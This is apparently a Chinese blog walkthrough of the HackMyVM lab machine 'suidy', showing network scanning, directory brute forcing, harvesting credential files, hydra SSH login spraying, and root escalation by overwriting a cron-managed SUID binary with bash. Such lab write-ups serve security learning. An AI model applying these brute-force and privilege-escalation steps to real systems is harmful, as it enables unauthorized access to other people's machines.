lvzhouhang

HackmyVM-suidy

  • ~11.90K 字
  1. 1. 信息搜集
  2. 2. 外部打点
    1. 2.1. 目录爆破
  3. 3. ssh登录
  4. 4. 提权ROOT

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:de:a5:1f       PCS Systemtechnik GmbH
192.168.31.181  08:00:27:86:a5:04       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.442 seconds (104.83 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.181 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.181:22
Open 192.168.31.181:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 09:10 EDT
Initiating ARP Ping Scan at 09:10
Scanning 192.168.31.181 [1 port]
Completed ARP Ping Scan at 09:10, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:10
Completed Parallel DNS resolution of 1 host. at 09:10, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:10
Scanning 192.168.31.181 [2 ports]
Discovered open port 22/tcp on 192.168.31.181
Discovered open port 80/tcp on 192.168.31.181
Completed SYN Stealth Scan at 09:10, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.31.181
Host is up, received arp-response (0.00051s latency).
Scanned at 2025-05-10 09:10:36 EDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:86:A5:04 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

外部打点

目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.181/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.181/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 22]
/robots.txt           (Status: 200) [Size: 362]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

robots.txt里有一个摩斯密码,解码之后是HIAGAIN

还有一个藏在最下面的很小很小的一个目录/shehatesme

1
2
She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist!
她恨我,因为我发现了真正的秘密!我在这个目录中放了很多 .txt 文件。.txt 个文件之一包含访问她的系统的凭据,例如 “theuser/thepass”!您只需要 Seclist 中的一个小 dict!

继续爆破目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.181/shehatesme/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.181/shehatesme/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/full.txt             (Status: 200) [Size: 16]
/about.txt            (Status: 200) [Size: 16]
/search.txt           (Status: 200) [Size: 16]
/privacy.txt          (Status: 200) [Size: 16]
/blog.txt             (Status: 200) [Size: 16]
/new.txt              (Status: 200) [Size: 16]
/page.txt             (Status: 200) [Size: 16]
/forums.txt           (Status: 200) [Size: 16]
/jobs.txt             (Status: 200) [Size: 16]
/other.txt            (Status: 200) [Size: 16]
/welcome.txt          (Status: 200) [Size: 16]
/admin.txt            (Status: 200) [Size: 16]
/faqs.txt             (Status: 200) [Size: 16]
/2001.txt             (Status: 200) [Size: 16]
/link.txt             (Status: 200) [Size: 16]
/space.txt            (Status: 200) [Size: 16]
/network.txt          (Status: 200) [Size: 16]
/google.txt           (Status: 200) [Size: 16]
/folder.txt           (Status: 200) [Size: 16]
/java.txt             (Status: 200) [Size: 16]
/issues.txt           (Status: 200) [Size: 16]
/guide.txt            (Status: 200) [Size: 16]
/es.txt               (Status: 200) [Size: 16]
/art.txt              (Status: 200) [Size: 16]
/smilies.txt          (Status: 200) [Size: 16]
/airport.txt          (Status: 200) [Size: 16]
/secret.txt           (Status: 200) [Size: 16]
/procps.txt           (Status: 200) [Size: 16]
/pynfo.txt            (Status: 200) [Size: 16]
/lh2.txt              (Status: 200) [Size: 16]
/muze.txt             (Status: 200) [Size: 16]
/alba.txt             (Status: 200) [Size: 16]
/cymru.txt            (Status: 200) [Size: 16]
/wha.txt              (Status: 200) [Size: 16]

然后整理一下保存下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# grep '.*\.txt' pass -o>pass.txt
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# for i in $(cat pass.txt);do curl "http://192.168.31.181/shehatesme$i";done
yuijhse/hjupnkk
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
hidden1/passZZ!
jhfbvgt/iugbnvh
john765/FDrhguy
maria11/jhfgyRf
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
mmnnbbv/iughtyr
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
smileys/98GHbjh
nhvjguy/kjhgyut
jaime11/JKiufg6
theuser/thepass
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6
jaime11/JKiufg6

ssh登录

1
2
3
4
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# awk -F'/' '{print $1}' 2 >>user
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# awk -F'/' '{print $2}' 2 >>pass.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# hydra -C 3  192.168.31.181 ssh -vV -f -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-10 09:30:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 34 login tries, ~3 tries per task
[DATA] attacking ssh://192.168.31.181:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
....
[22][ssh] host: 192.168.31.181   login: theuser   password: thepass
[STATUS] attack finished for 192.168.31.181 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-10 09:30:26

theuser:thepass登录

提权ROOT

1
2
theuser@suidy:~$ sudo -l
-bash: sudo: orden no encontrada

sudo没有东西

1
2
3
4
5
6
7
8
9
10
11
12
13
theuser@suidy:~$ find / -perm -u=s 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device

suid找到了一个suidyyyyy执行直接获得suidy的权限,查看权限

1
2
3
4
theuser@suidy:/home/suidy$ ls -ll
total 24
-r--r----- 1 suidy suidy     197 sep 26  2020 note.txt
-rwsrwsr-x 1 root  theuser 16704 sep 26  2020 suidyyyyy

ida打开查看

1
2
3
4
5
6
7
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0x3E9u);
  setgid(0x3E9u);
  system("/bin/bash");
  return 0;
}

上传一个pspy监控进程

1
2025/05/10 15:52:01 CMD: UID=0     PID=711    | sh /root/timer.sh

哎有一个timer.sh,盲猜他可能是给我们上传的suidyyyyy加suid权限的,随便cp一个文件覆盖掉,然后等一会

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
theuser@suidy:/home/suidy$ cat suidyyyyy
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
theuser:x:1000:1000:theuser,,,:/home/theuser:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
suidy:x:1001:1001:,,,:/home/suidy:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
theuser@suidy:/home/suidy$ ls -ll
total 8
-r--r----- 1 suidy suidy    197 sep 26  2020 note.txt
-rwsrwsr-x 1 root  theuser 1445 may 10 15:53 suidyyyyy

猜想是正确的,将bash给cp过来

1
2
3
4
5
theuser@suidy:/home/suidy$ cp /bin/bash ./suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy -p
suidyyyyy-5.0#
suidyyyyy-5.0# id
uid=1000(theuser) gid=1000(theuser) euid=0(root) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!